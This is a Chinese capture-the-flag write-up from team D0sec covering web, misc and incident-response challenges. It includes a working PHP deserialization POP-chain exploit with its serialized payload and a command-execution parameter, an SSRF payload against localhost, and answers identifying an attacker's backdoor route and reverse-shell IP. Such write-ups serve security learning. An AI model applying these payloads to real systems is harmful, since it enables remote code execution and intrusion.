战队:D0sec 队员:xiaolaisec
又双是一个人孤立无援,由于电脑的原因,应急响应部分的环境一直崩,然后又得重启,(得同时重启8台虚拟机,然后重新登录,每次环境启动又得10多分钟,访问Jumpserver莫名其妙老是给我弹502网关错误,然后就开始摆烂了,啊啊啊啊真的要崩溃了。。。。最后比赛两小时环境又奇迹般的好了一点(比赛快结束了又给我整这四处),也是匆匆忙忙写了几道应急响应的题。后续有时间会继续复现的(应该是没时间了。。。
当然言归正传,这次比赛还是学到了应急响应的不少东西的。
WEB
R23
经过测试无法绕过wakeup,不过可以通过变量传递改变class b->c的值
但是题目过滤了R:2/R:3 ,大写R可以从左到右与第n个反序列化的变量进行绑定,所以我们不能把$x->c=&$x->b;放在前面,可以多构造几个值,让s:1:"b";N;s:1:"c"往后靠
Exp:
<?php
class a{
public function __get($a){
$this->b->love();
}
}
class b{
public function __destruct(){
$tmp = $this->c->name;
}
public function __wakeup(){
$this->c = "no!";
$this->b = $this->a;
}
}
class xk{
public function love(){
system('ls');
}
}
$x=new b();
$x->a=new a();
$x->a->b=new xk();
$x->x='a';
$x->c=&$x->b;
echo serialize($x);
Payload:
?pop=O:1:"b":4:{s:1:"a";O:1:"a":1:{s:1:"b";O:2:"xk":0:{}}s:1:"x";s:1:"a";s:1:"b";N;s:1:"c";R:5;}&a=cat flag.php
F12看源码即可
Web-签到
由于/flag的内容刚好就是paluctf,直接SSRF即可
Payload:?url=http://127.0.0.1/flag
MISC
江
flag{湖北省武汉市江汉二路与江汉路步行街交叉路口}
Misc-签到
转ASCII可知:关注知攻善防和狐狸说安全公众号分别发plbctf即可得到flag的两部分了
flag{TreJaiuLT1rgbdfG0Eay}
应急响应
应急响应-1
题目要求:找到JumpServer堡垒机中flag标签的值。
环境搭好访问地址,查看标签即可
应急响应-3
题目要求:提交攻击者源IP
攻击者IP:192.168.1.4
应急响应-7
题目要求:提交存在反序列化漏洞的端口
可以看到用fscan扫出来的webserver端口号8080返回200,猜测就是漏洞端口
应急响应-8
题目要求:提交攻击者使用的后门路由地址
提交格式:[md5(/api/xxx)]
提交格式给了提示,一开始我以为是 /var/www/html/index.php,因为看回放的是他写入了一句话,但是格式不对,最后在app.py得到了答案,后门路由地址为/api/system
应急响应-9
题目要求:提交dnslog反弹域名。
答案为0vqkht.palu.cn
应急响应-11
题目要求:交攻击者反弹shell使用的语言
答案为python
应急响应-11
题目要求:提交攻击者反弹shell的ip。
答案为 82.157.238.174